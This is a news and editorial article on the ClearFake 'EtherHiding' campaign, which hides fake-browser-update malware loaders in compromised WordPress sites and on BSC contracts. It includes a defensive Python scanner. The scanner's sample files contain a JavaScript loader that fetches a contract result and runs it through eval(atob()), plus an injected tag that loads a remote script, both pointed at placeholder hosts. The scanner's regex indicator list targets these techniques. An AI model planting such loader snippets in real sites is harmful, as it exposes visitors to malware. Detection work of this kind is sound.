
Unveiling the “Etherhiding” Technique: Uncovering Malicious Code in WordPress Sites


Rise of EtherHiding: Abusing Blockchain Technology for Malicious Activities

Campaign Overview and Technique

Researchers from Guardio have uncovered a new cyberattack campaign dubbed “ClearFake” that utilizes blockchain technology to host and spread malicious code. In this campaign, threat actors exploit compromised WordPress sites to distribute fake browser updates that contain various forms of malware, including the infostealers RedLine, Amadey, and Lumma. While blockchain is commonly associated with cryptocurrency transactions and their security, this campaign, known as “EtherHiding,” demonstrates how attackers can leverage blockchain for other nefarious activities.

EtherHiding utilizes Binance Smart Chain (BSC) contracts from Binance, one of the largest cryptocurrency sites globally, to host parts of a malicious code chain. By leveraging BSC contracts, attackers can employ a technique that Guardio describes as the “next level of Bullet-Proof Hosting.” This method allows malicious code to be hosted and served in a manner that evades detection and prevents takedowns. The immutable and publicly accessible nature of the blockchain enables attackers to execute actions automatically and host code ‘on-chain’ without an avenue for removal.

Attack Methodology

The EtherHiding attack begins when threat actors inject concealed JavaScript code into compromised WordPress sites; that code retrieves a second-stage payload from an attacker-controlled server. Attackers then deface the websites, presenting visitors with a convincing overlay that demands a browser update before the site can be accessed. Because the second stage is fetched at page-load time, the attackers can remotely modify the infection process and display any message they choose without revisiting the WordPress sites themselves. This dynamic nature of the attack makes it difficult to detect and halt.

Blockchain Abuse and Potential Countermeasures

Beyond the specific EtherHiding technique, the ClearFake campaign highlights the potential for blockchain abuse in various other malicious activities, such as malware propagation, data exfiltration, and evading traditional law-enforcement takedown methods. While blockchain and other Web 3.0 technologies offer innovation, they also provide fertile ground for threat actors to turn those same benefits to nefarious purposes.

To block the ClearFake attack, Guardio suggests that Binance could disable queries to addresses already identified as “malicious” or disable the eth_call debug method for unvalidated contracts. While it remains undisclosed whether Guardio reached out to Binance regarding these potential fixes, such proactive measures by cryptocurrency platforms could contribute to mitigating abuse of blockchain technology.

Moreover, securing WordPress sites, often vulnerable to exploitation, is crucial in preventing threats like the ClearFake campaign from causing widespread damage. Guardio recommends keeping WordPress infrastructure and plugins updated, safeguarding credentials, using robust and periodically-changed passwords, and maintaining a vigilant watch over site activity to promptly detect and mitigate any malicious instances.
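The monitoring advice above is easier to act on with a concrete check. The following scanner is an added example written for this article, not code from Guardio or from the campaign itself. It walks a set of WordPress files and flags script content that shows the traits described in the Attack Methodology and countermeasures sections: a call to the eth_call JSON-RPC method, a decode-then-eval pattern, a dynamically created script tag that loads a remote file, and long hex blobs (for example a contract address). The sample files, the host names and the contract address are constructed placeholders, and the indicator list is an assumption chosen for illustration; a real deployment would tune it against the site's own legitimate plugins.

```python
import os
import re
from dataclasses import dataclass

# Constructed sample "WordPress tree" so the scanner runs offline.
# Host names and the contract address are placeholders, not real indicators.
SAMPLE_FILES = {
    "wp-content/themes/demo/footer.php":
        "<?php wp_footer(); ?>\n<script src=\"/wp-includes/js/jquery/jquery.js\"></script>\n",
    "wp-content/plugins/demo/loader.js":
        "var a = \"0xABCDEF0123456789ABCDEF0123456789ABCDEF01\";\n"  # placeholder address
        "fetch(\"https://rpc.example.invalid/\", {method: \"POST\",\n"
        "  body: JSON.stringify({jsonrpc: \"2.0\", id: 1, method: \"eth_call\",\n"
        "  params: [{to: a, data: \"0x\"}, \"latest\"]})})\n"
        "  .then(r => r.json()).then(j => eval(atob(j.result)));\n",
    "wp-content/uploads/2023/10/post.html":
        "<p>Hello</p>\n<script>var s=document.createElement('script');"
        "s.src='https://updates.example.invalid/x.js';document.head.appendChild(s);</script>\n",
}

# Indicator patterns (assumed for this example; tune to your environment).
INDICATORS = [
    # JSON-RPC read call named in the article's countermeasures section.
    ("rpc_eth_call", re.compile(r'["\']?eth_call["\']?')),
    # Decode-then-execute chains are a common way to hide a second stage.
    ("eval_decode", re.compile(r'eval\s*\(\s*atob\s*\(')),
    # A script element created at runtime whose src points at a remote host.
    ("dynamic_remote_script", re.compile(
        r"createElement\(\s*['\"]script['\"]\s*\)[\s\S]{0,200}?\.src\s*=\s*['\"]https?://")),
    # 40+ hex characters after 0x: at least an address-sized blob.
    ("long_hex_blob", re.compile(r'0x[0-9a-fA-F]{40,}')),
]


@dataclass(frozen=True)
class Finding:
    path: str
    line: int
    indicator: str
    excerpt: str


def scan_text(path: str, text: str) -> list[Finding]:
    """Apply every indicator to one file's content and report each hit with its line."""
    findings = []
    for name, pattern in INDICATORS:
        for m in pattern.finditer(text):
            line_no = text.count("\n", 0, m.start()) + 1
            excerpt = text[m.start():m.start() + 60].replace("\n", " ")
            findings.append(Finding(path, line_no, name, excerpt))
    return findings


def scan_files(files: dict[str, str]) -> list[Finding]:
    """Scan an in-memory mapping of path -> content (used for the constructed sample)."""
    findings = []
    for path, text in files.items():
        findings.extend(scan_text(path, text))
    return findings


def scan_directory(root: str, exts=(".php", ".js", ".html", ".htm")) -> list[Finding]:
    """Scan a real WordPress document root on disk; binary-ish files are skipped."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for n in names:
            if not n.lower().endswith(exts):
                continue
            full = os.path.join(dirpath, n)
            try:
                with open(full, "r", encoding="utf-8", errors="ignore") as fh:
                    findings.extend(scan_text(os.path.relpath(full, root), fh.read()))
            except OSError:
                continue
    return findings


def summarize(findings: list[Finding]) -> dict[str, list[str]]:
    """Collapse findings to path -> sorted list of distinct indicator names."""
    out: dict[str, set[str]] = {}
    for f in findings:
        out.setdefault(f.path, set()).add(f.indicator)
    return {p: sorted(names) for p, names in out.items()}


if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f.path}:{f.line} [{f.indicator}] {f.excerpt}")
```

On the constructed sample the plugin loader is flagged three times (eth_call, eval/atob, hex blob) while the clean theme footer produces nothing. Any single indicator can occur in legitimate code, so treat hits as triage leads: a file that combines several of them, or that changed outside a known update window, is the one worth pulling for review.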

Editorial: Balancing Innovation and Security

The emergence of the ClearFake campaign underscores the ongoing cat-and-mouse game between cybercriminals and security experts in the face of advancing technology. While blockchain and Web 3.0 technologies offer immense potential for innovation, they also carry inherent security risks that need addressing.

As society embraces the benefits of emerging technologies, it is essential to adopt a proactive stance on cybersecurity. Developers and organizations developing blockchain platforms must prioritize building secure frameworks that prevent malicious abuse. Additionally, collaboration between cybersecurity professionals, blockchain experts, and law enforcement agencies should be fostered to quickly identify and mitigate emerging threats.

However, striking the right balance between security and innovation is a delicate task. Solutions that impede the fundamental capabilities and advantages of blockchain may undermine its potential. Therefore, any security measures implemented should carefully consider the trade-offs between security and the overall functionality and benefits of blockchain technology.

Advice: Safeguarding Against Blockchain Abuse

As the ClearFake campaign highlights the susceptibility of WordPress sites and the potential for blockchain abuse, individuals and organizations can take several steps to fortify their defenses:

1. Regularly Update and Secure WordPress Infrastructure:

Keeping WordPress installations, themes, and plugins up to date significantly reduces the risk of exploitation. Employing robust security measures, such as two-factor authentication and website security plugins, enhances the protection of WordPress sites.

2. Strengthen Credentials and Passwords:

Adopting strong and periodically-changed passwords for all WordPress accounts and other associated services is crucial. Implementing a password management system and enabling multi-factor authentication can further fortify account security.

3. Monitor Website Activity:

Closely monitoring site activity and employing website monitoring tools can help detect any signs of malicious activity promptly. Constant vigilance and proactive response to any suspicious activities can mitigate potential threats.

4. Engage in Continuous Education and Awareness:

Keeping abreast of the latest trends, risks, and countermeasures in the cybersecurity landscape is essential. Education and awareness enable individuals and organizations to make well-informed decisions regarding security practices, including those related to blockchain technology.

5. Encourage Collaboration:

Promoting collaboration between cybersecurity professionals, blockchain experts, and relevant stakeholders can foster collective efforts to combat emerging threats and develop effective mitigation strategies.
